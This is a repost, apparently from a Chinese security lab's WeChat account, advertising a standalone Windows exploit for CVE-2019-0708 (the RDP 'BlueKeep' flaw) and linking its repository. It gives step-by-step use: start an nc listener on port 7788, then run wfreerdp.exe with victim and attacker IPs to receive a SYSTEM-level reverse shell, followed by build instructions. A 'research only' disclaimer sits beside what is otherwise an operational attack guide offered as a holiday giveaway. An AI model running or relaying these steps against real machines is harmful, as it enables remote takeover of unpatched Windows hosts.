国庆福利||CVE-2019-0708-EXP-Windows-Version

释放双眼,带上耳机,听听看~!

点击上方“凌天实验室”,“星标或置顶公众号”

漏洞、技术还是其他,我都想第一时间和你分享

链接:https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows
作者:cbwang505

申  明

作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关


CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell

复现环境

☛ 被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
☛ 攻击者操作系统Attacker:Windows 10 x64位操作系统
☛ 编译环境Visual Studio 2013

使用说明


☛ 进入CVE-2019-0708-EXP-Release目录
☛ 运行nc.exe -lvp 7788
☛ 运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

安装教程

☛ 复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\

☛ 解压openssl.7z至C:\openssl\

☛ 以管理员身份安装nasm-2.14.02-installer-x64.exe

☛ 添加C:\Program Files\NASM至path环境变量

☛ 以管理员身份安装cmake-3.15.3-win64-x64.msi

☛ 添加C:\Program Files\CMake\bin至path环境变量

☛ 重启计算机

解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\

☛ 工程目录右击->”工程依赖项”->”生成自定义”,然后勾选nasm这一项

☛ 运行”C:\Program Files\CMake\bin\cmake.exe” E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt

☛ 编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原



运行效果



凌天
实验室

凌天实验室,是安百科技旗下针对应用安全领域进行攻防研究的专业技术团队,其核心成员来自原乌云创始团队及社区知名白帽子,团队专业性强、技术层次高且富有实战经验。实验室成立于2016年,发展至今团队成员已达35人,在应用安全领域深耕不辍,向网络安全行业顶尖水平攻防技术团队的方向夯实迈进。

本文源自微信公众号:凌天实验室

人已赞赏
安全工具

一次利用谷歌语法渗透公网弱目标实例

2019-10-14 14:04:48

安全工具

​Java 反序列化漏洞始末(2)

2019-10-14 14:04:52

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索